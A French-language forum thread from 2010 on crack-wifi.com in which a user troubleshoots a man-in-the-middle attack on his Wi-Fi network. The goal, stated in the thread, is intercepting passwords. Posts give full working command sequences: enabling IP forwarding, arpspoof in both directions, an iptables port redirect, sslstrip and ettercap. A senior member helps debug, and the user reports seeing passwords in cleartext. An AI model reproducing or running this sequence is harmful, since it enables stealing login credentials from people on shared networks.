Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 22-10-2010 12:19:03

nerull
Membre
Inscription : 04-09-2009
Messages : 18

SSLSTrip ne fonctionne pas

Bonjour à tous

Je rencontre des petites difficultés. Mon but c'est de me mettre en MITM et d'utiliser SSLSTrip pour intercepter les mots de pass.

Mes configuration :

         PC1  ------ Ethernet ------- Modem FREE

IP PC1 :192.168.0.10
IP modem : 192.168.0.254

Sur mon Mini Pc portable en Wifi carte RTL8187 Alpha, BT4 Persistent.

J'ai suivi  le PDF de Mickey et antares

Sans sslstrip, tout fonctionne tres bien. jintercepte les mots de pass mais apres avoir eu un message de certificats erronés.

Je veux passer au petit cran au dessus :

Shell 1 :

echo "1" > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

Valeur renvoyée : 1

arpspoof -i wlan0 -t 192.168.0.10 192.168.0.254

Shell 2 :

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 15000
sslstrip -a -k -f -l 15000

Shell 3 :

ettercap -T -q -i wlan0

Et quand avec mon PC je vais sur un site avec https , j'ai le meme resultat que sans sslstrip => Connexion non protégée ...certificat ..
C'est à dire en me connectant en wifi puis ettercap-ng ( tout simplement)

Ou ca cloche ?

ps : si à la fin je ne met pas ettercap , la j'aurai pas de probleme de certificat mais j'aurai " connexion echouée "


Merci beaucoup de votre aide

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 22-10-2010 23:10:02

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : SSLSTrip ne fonctionne pas

Je suppose que tu parles du PDF sur ce sujet --> TUTO BT4 final SSLSTRIP (Bonus. ARP Poisoning + DNS Spoof + httpd)
A vrai dire, c'est surtout [email protected] qui a fait tout le boulot, le mérite lui revient smile

Si tu as exactement suivi les étapes, ça devrait marcher tout seul, mais visiblement ce n'est pas le cas. A mon avis c'est une commande iptable qui manque, mais là comme ça je sais pas dire laquelle hmm
A l'occasion je vais refaire le tuto pour vérifier, mais là je n'ai pas de réseau-test sous la main pour faire de l'ARP poisoning, donc il faudra que tu attendes un peu smile

[EDIT] Essaie un peu de lancer la commande arpspoof sans préciser de target, avec juste l'adresse de la passerelle :

arpspoof -i wlan0 arpspoof -i wlan0 192.168.0.254

(les autres commandes ne changent pas, mais ne lance pas Ettercap)
Autre possibilité : lancer 2 commandes arpspoof symétriques :

arpspoof -i wlan0 -t 192.168.0.10 192.168.0.254
arpspoof -i wlan0 -t 192.168.0.254 192.168.0.10

(les autres commandes ne changent pas non plus, toujours sans lancer Ettercap regarde si ça marche)

Le but est de ne pas utiliser Ettercap, pour ne pas qu'il joue avec son faux certif' wink

[EDIT]² Voir ce topic, on a parlé de problèmes similaires --> ettercap ng: seuls les login/pass des boites mails sont décryptés

Hors Ligne

#3 29-10-2010 12:22:24

nerull
Membre
Inscription : 04-09-2009
Messages : 18

Re : SSLSTrip ne fonctionne pas

MErci pour ton aide , je suis arrivé à une methode qui marche, je vous la dis  et j'aurai quelques questions smile

Shell 1 :

echo "1" > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward

/etc/init.d/wicd start

=> je me connecte a mon wifi

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 15000

shell 2 :

arpspoof -i wlan0 -t 192.168.0.10 192.168.0.254

shell 3 :

arpspoof -i wlan0 -t 192.168.0.254 192.168.0.10

je rajoute au shell 1 apres le spoof lancé :

sslstrip -a -k -f -l 15000

La tout marche et meme si je lance ettercap a coté ! Le certificat sera toujours bon et je verrai mes mdp en clair sans fouiller dans le log !



Par contre des fois ca marche plus alors que ca marchait . et la jai pas d'explication.

je procede de la meme facon et je me retrouve avec des "serveur introuvable" pour google, "connexion impossible"  ou desfois SSlstrip n'enregistre rien.

il y a une explication ?

Dernière modification par nerull (29-10-2010 12:22:54)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.021 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]